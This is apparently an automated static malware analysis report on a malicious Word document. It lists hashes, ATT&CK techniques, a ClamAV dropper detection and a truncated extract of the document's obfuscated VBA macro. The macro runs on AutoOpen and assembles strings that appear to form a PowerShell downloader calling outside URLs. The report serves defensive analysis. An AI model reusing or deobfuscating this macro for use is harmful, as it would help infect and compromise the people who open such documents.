Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6c81a06228b68121…

MALICIOUS

Office (OLE)

Size: 133.5 KB
Created: 2018-02-13 08:01:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 616ffd723dd5729b19fb0936175a51ad
SHA-1: 72a5b72fa0ecca24ac55789cb19781ec9f0d6a27
SHA-256: 6c81a06228b68121daed85eeaff04fea88620dc3681ebe6ec34494b279ae8acb
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened with macros enabled. The macro calls the Shell() function, a common way for a macro to execute arbitrary commands. The heavy obfuscation of the macro combined with the Shell() call strongly suggests it is designed to download and execute a secondary payload, which is consistent with dropper behavior. The ClamAV detection further supports the malicious classification.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6447493-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447493-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 27928 bytes
SHA-256: e94015899c119c389291fb84354016b4e981560da34538f413c151b9bece66d0

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zCXjiKlX"
Sub AutoOpen()
On Error Resume Next
DbJShHFwQ = TaIEonJ - Sgn(BFmhpI) - (4733504 - Tan(5556505) / 2810340 - ChrW(BCAAjqJPG))
iqcpWRmbR = XfH - Sgn(mArNWlAuEs) - (6082448 - Tan(9135478) / 2799740 - ChrW(TrRuZhf))
YYQPPChGb = utUOzsdmdFjl - Sgn(JaDTHajcFaC) - (2728690 - Tan(5314530) / 5217272 - ChrW(GjTndBkBuFUwoI))
Application.Run "GJdWYqoY", ZmpfWJiQrQwXSz
vbvmpGoMj = frOoTRAX - Sgn(jfumwI) - (6563404 - Tan(4775318) / 4857342 - ChrW(NncvU))
KwGbmUIuz = HlmvhcFwhIcAo - Sgn(iHhPDWmDwuiULY) - (7217208 - Tan(9408882) / 4542484 - ChrW(vtoXvdrjIqu))
nrJKGzfms = dGDprRNRjLkk - Sgn(FvLGLEYXNwJI) - (578662 - Tan(4082231) / 2097654 - ChrW(bGKi))
End Sub
Function ZmpfWJiQrQwXSz()
On Error Resume Next
UClwCvDz = ZsmUMj - Sgn(qUJidKI) - (4721237 - Tan(2065442) / 7142801 - ChrW(qnROACWiiUAItB))
ibAVb = mzldLwCs - Sgn(wrHCI) - (3046709 - Tan(3445754) / 1931161 - ChrW(fzuzKsjziAAp))
KmBCP = PdGYL - Sgn(hZzovHRJvUW) - (3604471 - Tan(465863) / 8106818 - ChrW(NEcomtu))
PYuLGUDU = BWiPjJl + Mid(zRAlf + "SsBZYYwwLPPbB+Pb'+'Be/oDV'+'rtfgb+fgbs3+ts3Tufgb'+'+fgb2/ts3+ts3Eo1.Splfgb+fgbts3fgb+fgb+ts3itts3+ts3(Ets3+ts3ots3+ts31ts3+ts'+'3?ts3+ts3Eots3+fgb+fgbtsjzSRnhc" + YqUacoh, 11, 142)
DSjwKw = dMhzzuCZdjYt - Sgn(LlnDnhhRYmNX) - (2598395 - Tan(512586) / 6377762 - ChrW(dztKGkBTuUqYF))
aKEjza = zjlpEvV - Sgn(BLAWEZTamrVdz) - (7098924 - Tan(6058974) / 6636748 - ChrW(bjTJTrJMGn))
VSXuIRH = lYwlaizhJk - Sgn(czThwDbSOA) - (613631 - Tan(1766568) / 5513532 - ChrW(CmhUr))
ijoiNVRi = OBrTkbivj + Mid(fcPj + "PjfahVPiAHzQnGa+PbBfgb+fgb (Ets3+ts3oPb'+'B+PbBt'+'s3'+'+ts31.ts3+ts3exEo1+fgb+f'+'gb'+'ts3+ts3Eo1ts3+ts3ets3fgb+fgb+'+'ts3Eo1);fots3+ts3reacts3+ts3h(ofgbzBDWj" + zpti, 16, 139)
FNEfh = PNSbhqOfTFUYAa - Sgn(iNj) - (1046260 - Tan(6671584) / 9405590 - ChrW(bmZJNEGzXJfVXk))
EvrGbu = UOQF - Sgn(SnlLn) - (9614443 - Tan(5925860) / 748728 - ChrW(oUp))
cSQSSoY = TmfBXcJZUiKtiC - Sgn(YtSodmd) - (7674238 - Tan(233212) / 2595619 - ChrW(PZCwippX))
dhMUqzJw = wmloOsjD + Mid(nzYvvGT + "ZkkdziICiVLts3PbB+PbB+ts3fgb+fgbyts3fgb+fgb+t'+'s3/?http:'+'ts3+ts3//wwt'+'s'+'3+ts3wts3+ts3.bats3+fgb+fgbtfgb+fgbs3by-glf'+'gb+fgbamouts3+ts3rts3+ts3.dt'+'s3+PbB+P'+'bBts'+'3GFhTmncLziwzBOIELYwTDKaO" + lsFkoYhiOVZY, 10, 166)
DKsNU = TzacAhBfjavNUM - Sgn(qLJdKOzw) - (5872203 - Tan(7792085) / 5159405 - ChrW(ObEFO))
wqJbiMh = wsi - Sgn(tiiLJPDsos) - (4402076 - Tan(52036) / 6129057 - ChrW(LawkUAvnZVmE))
XKPsRz = UhMXUoIRfw - Sgn(EkslAhpOvPunEM) - (4776016 - Tan(6426041) / 7225535 - ChrW(FIYF))
YCrJOsr = waSqovl + Mid(EaSIvMfHWfMMpw + "vO]'+'-joiNts3ts3)(((ts3oPbB+PbBH8nts3+tsPbB+PbB3sadaPbB+PbBsdfgb+fg'+'b = &(Eo1nEts3+ts3o1+fgb+fgbEots3+ts31PbB+P'+'b'+'Be'+'Ets3+tfgbHZtkfJMPimcqhE" + oBNjWWAVEH, 3, 133)
JOlDEdVSYs = bzAJZXMmCYsO - Sgn(HjpYb) - (3531821 - Tan(2527339) / 5477664 - ChrW(wUI))
WwJrX = UJHFzLG - Sgn(VjizkPfuWjX) - (2283069 - Tan(6479455) / 117977 - ChrW(FhvtMNbCjA))
MSCbJhZI = DDiw - Sgn(hIZlAGZq) - (479443 - Tan(6539114) / 6584759 - ChrW(MzwkTfBXD))
HntjzBp = jLcVCMXWjbzf + Mid(IKnrjYIPatH + "lvzDQoYcGPCcQcMbmzcLCXvLWoLAG]34  -cREplaCets3ocnts3,[chaPbB+fgb+fgbPbBR]9PbB+PbB2 -RepPbB+PbBLacfgb+fgbe fgb+fgb([chaR]111+[c'+'haR]72+[ch'+'aR]56),[chaR]36 -RepLace  ts39WKts3fgb+fgb,[chaR]96 -fgb+jT" + vGXLZ, 30, 170)
FGQqcrBi = WjX - Sgn(YUPOBrWEa) - (2581532 - Tan(8101972) / 1128494 - ChrW(EBGtcEB))
wSplGcjiOa = Pwb - Sgn(twpTvG) - (5501343 - Tan(871072) / 7436723 - ChrW(qao))
IFiGcwjiP = XHuh - Sgn(AYMtncKtfWaJW) - (7681512 - Tan(89896) / 1574495 - ChrW(hliGNBjDLjEWh))
qrTZaFTltJr = tYuiCwdMc + Mid(ZLqDHP + "DJmAHnhfLEPLAce(([chaR]99+[chaR]1pOKXXIvZjD " + wIFqifzpj, 10, 24)
dwsjjzHMCfA = futuPSTMrtQYE - Sgn(wiVnRAM) - (5030230 - Tan(9004359) / 6194703 - ChrW(zGuODZdWluPJ))
IhTpvodKWj = XENdjDowtISw - Sgn(ataiFzNEQMYzo) - (3733784 -
... (truncated)